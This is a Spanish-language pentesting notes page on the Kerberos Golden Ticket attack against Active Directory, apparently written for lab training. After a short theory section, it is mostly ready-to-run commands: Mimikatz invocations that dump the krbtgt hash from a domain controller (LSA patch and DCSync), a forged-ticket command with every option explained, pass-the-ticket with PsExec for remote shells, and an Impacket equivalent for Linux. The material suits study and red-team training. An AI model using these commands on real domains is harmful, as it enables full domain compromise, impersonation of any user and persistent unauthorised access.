Golden Ticket

Teoria

Un boleto dorado está firmado y encriptado por el hash de krbtgt account, lo que lo convierte en un boleto TGT válido.
Dado que el controlador de dominio (servicio KDC) no realiza la validación de la cuenta de usuario hasta que TGT tenga más de 20 minutos, podemos usar incluso cuentas eliminadas/revocadas.
El hash krbtgt user podría usarse para hacerse pasar por cualquier usuario con cualquier privilegio, incluso desde una máquina sin dominio.
El cambio de contraseña no tiene efecto en este ataque.

Contraseña convertida a hash NTLM, una marca de tiempo se cifra con el hash y se envía al KDC (AS-REP)
El TGT está encriptado, firmado y entregado al usuario (AS-REP). Solo krbtgt puede abrir y leer datos TGT.
TGT encriptado con krbtgt hash al solicitar un ticket TGS (TGS-REQ)
TGS cifrado utilizando el hash NTLM del servicio de destino (TGS-REP)
El usuario se conecta al servidor que aloja el servicio en el puerto apropiado y presenta el TGS (AP-REQ).
Autenticación mutua opcional

Requerimientos

Volcamos hash NTLM de usuario krbtgt:

Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dcorp-dc

o 

Invoke-Mimikatz -Command '"lsadump::dcsync /domain:dollarcorp.moneycorp.local /user:dcorp\krbtgt"' -Computername dcorp-dc

Domain-SID:

# Powerview
Get-DomainSID -Domain testlab.local
# o cualquier otra enumeracion del dominio

Ejecucion

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 id:500 /ticket"'

kerberos::golden : Nombre del modulo
/User:Administrator : Nombre de usuario para el que se genera el TGT
/domain:dollarcorp.moneycorp.local : dominio
/sid:S-1-5-21-1874506631-3219952063-538504511 : SID del domain
/krbtgt:ff46a9d8bd66c6efd77603da26796f35 : Hash NTLM(RC4) de la cuenta krbtgtaccount. Use /aes128 y /aes256 para usar claves AES.
/id:500 /groups:512 : UserRID opcional (predeterminado 500) y grupo predeterminado 513 512 520 518 519)
/ptt : Inyecta el ticket en el proceso actual de PowerShell no es necesario guardar el ticket en el disco
/ticket : Guarda el ticket en un archivo para su uso posterior
/startoffset:0 : Opcional cuando el ticket está disponible (predeterminado 0 -ahora mismo) en minutos. Use negativo para un boleto disponible en el pasado y un número mayor para el futuro.
/endin:600 : Duración del ticket opcional (el valor predeterminado es 10 años) en minutos. La configuración predeterminada de AD es 10 horas = 600 minutos
/renewmax:10080 : Duración del boleto opcional con renovación (el valor predeterminado es 10 años) en minutos. La configuración predeterminada de AD es 7 días = 100800

otros ejemplos:

kerberos::golden /user:evildevil /domain:nuevo.prueba.local /sid:S-1-5-21-3834471224-1778789729-1790613645 /krbtgt:ab7897c47eeffd4871ae56a071326793 /id:500


Invoke-Mimikatz -Command '"kerberos::ptt ticket.kirbi" "misc::cmd"'

PsExec64.exe \\HPPRDV0020.nuevo.prueba.local cmd

Golden Ticket en Linux:

python3 /usr/share/doc/python3-impacket/examples/ticketer.py -nthash eb0938cd58798f0575f9271a72df1b5e -domain-sid S-1-5-21-383804671-1321805778-1678180174 -domain chichocorp.chichos Administrator

export KRB5CCNAME=/root/impacket-examples/stegosaurus.ccache
python psexec.py jurassic.park/[email protected] -k -no-pass

PreviousAbuse MSSQL Servers NextEstructura de Active directory y Creacion

Last updated 2 years ago

hashtagTeoria

hashtagRequerimientos

hashtagEjecucion

hashtagGolden Ticket en Linux:

Teoria

Requerimientos

Ejecucion

Golden Ticket en Linux: